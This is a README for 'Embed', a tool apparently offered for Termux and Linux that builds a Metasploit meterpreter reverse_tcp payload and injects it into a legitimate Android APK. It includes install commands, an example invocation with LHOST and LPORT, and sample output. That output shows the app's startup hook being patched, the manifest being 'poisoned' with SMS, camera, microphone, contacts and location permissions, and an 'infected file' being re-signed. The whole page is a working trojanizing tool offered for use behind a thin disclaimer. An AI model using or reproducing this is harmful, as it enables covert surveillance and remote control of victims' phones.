Embed
Embed Metasploit Payload in Legtim APK with Termux
Install / Use
/learn @ivam3/EmbedREADME
EMBED v.3.0
This tool creates a payload with metasploit framework and injected into a legitimate APK.
DISCLAIMER
If the law is violated with it's use, this would be the responsibility of the user who handled it.. Ivam3 is not responsible for the misuse that can be given to everything that this laboratory entails
REQUIREMENTS.
- Metasploit
- Java
- Keytool
- Apktool
- Jarsigner
- Apksigner
- Aapt
INSTALLATION.
- Linux OS:
apt install git -y;
git clone https://github.com/ivam3/embed.git;
chmod +x setup;
bash setup manual
- Android OS with Termux:
apt install wget;
mkdir -p $PREFIX/etc/apt/sources.list.d;
wget https://raw.githubusercontent.com/ivam3/termux-packages/gh-pages/ivam3-termux-packages.list -O $PREFIX/etc/apt/sources.list.d/ivam3-termux-packages.list;
apt update && apt upgrade -y;
apt install embed -y
USAGE
Embed v3+ come with 3 options to use a keystore signature for sign your apk files :
- {3} To create your own keystore.
- {2} Using your own keystore; if you have one or if you was created it before in option 3.
- {1} Default: Using a keystore with the next parameters :
Enter keystore password: android
Re-enter new password: android
What is your first and last name?
[Unknown]: Android Debugging
What is the name of your organizational unit?
[Unknown]: Android
What is the name of your organization?
[Unknown]: Android Debugging
What is the name of your City or Locality?
[Unknown]: California
What is the name of your State or Province?
[Unknown]: San Francisco
What is the two-letter country code for this unit?
[Unknown]: CA
Is CN=Android Debugging, OU=Android, O=Android Debugging, L=California, ST=San Francisco, C=CA correct?
[no]: yes
Generating 2,048 bit RSA key pair and self-signed certificate (SHA256withRSA) with a validity of 10,000 days
for: CN=Android Debugging, OU=Android, O=Android Debugging, L=California, ST=San Francisco, C=CA
[Storing key.jks]
EXAMPLE OF USAGE
$ embed.rb [target.apk] [msfvenom options]
$ embed PATH/to/legitim.apk -p android/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4546
._____ __ __ ____ _____ ____
| ____| \/ | __ )| ____| _ \
| _| | v3.0 | _ \| _| | | | |
| |___| |\/| | |_) | |___| |_| |
|_____|_| |_|____/|_____|____/
#:::::::: By Ivam3 ::::::::::::#
[?]─➤ Set a keystore signer
╰{1}─➤ Default (Android Debug key)
╰{2}─➤ Using your own key
╰{3}─➤ Create a new key
╰────➤ 1
[*]─➤ Generating msfvenom payload..
[*]─➤ Signing payload..
[*]─➤ Decompiling orignal APK..
[*]─➤ Ignoring the resource decompilation..
[*]─➤ Decompiling payload APK..
[*]─➤ Locating onCreate() hook..
[*]─➤ Copying payload files..
[*]─➤ Loading original/smali_classes3/mx/mxlpvplayer/activities/SplashActivity.smali and injecting payload..
[*]─➤ Poisoning the manifest with meterpreter permissions..
[+]─➤ Adding android.permission.CHANGE_WIFI_STATE
[+]─➤ Adding android.permission.ACCESS_COARSE_LOCATION
[+]─➤ Adding android.permission.ACCESS_FINE_LOCATION
[+]─➤ Adding android.permission.READ_PHONE_STATE
[+]─➤ Adding android.permission.SEND_SMS
[+]─➤ Adding android.permission.RECEIVE_SMS
[+]─➤ Adding android.permission.RECORD_AUDIO
[+]─➤ Adding android.permission.CALL_PHONE
[+]─➤ Adding android.permission.READ_CONTACTS
[+]─➤ Adding android.permission.WRITE_CONTACTS
[+]─➤ Adding android.permission.WRITE_SETTINGS
[+]─➤ Adding android.permission.CAMERA
[+]─➤ Adding android.permission.READ_SMS
[+]─➤ Adding android.permission.SET_WALLPAPER
[+]─➤ Adding android.permission.READ_CALL_LOG
[+]─➤ Adding android.permission.WRITE_CALL_LOG
[+]─➤ Adding android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS
[*]─➤ Rebuilding /PATH/to/legitim.apk
with meterpreter injection as data/data/com_backdoored.apk..
[*]─➤ Signing data/data/com_backdoored.apk ..
[*]─➤ Aligning data/data/com_backdoored.apk ..
[+]─➤ Infected file legitim.apk_final ready.
License
GNU
Follow me on Socials Network
Related Skills
node-connect
343.3kDiagnose OpenClaw node connection and pairing failures for Android, iOS, and macOS companion apps
frontend-design
92.1kCreate distinctive, production-grade frontend interfaces with high design quality. Use this skill when the user asks to build web components, pages, or applications. Generates creative, polished code that avoids generic AI aesthetics.
openai-whisper-api
343.3kTranscribe audio via OpenAI Audio Transcriptions API (Whisper).
qqbot-media
343.3kQQBot 富媒体收发能力。使用 <qqmedia> 标签,系统根据文件扩展名自动识别类型(图片/语音/视频/文件)。
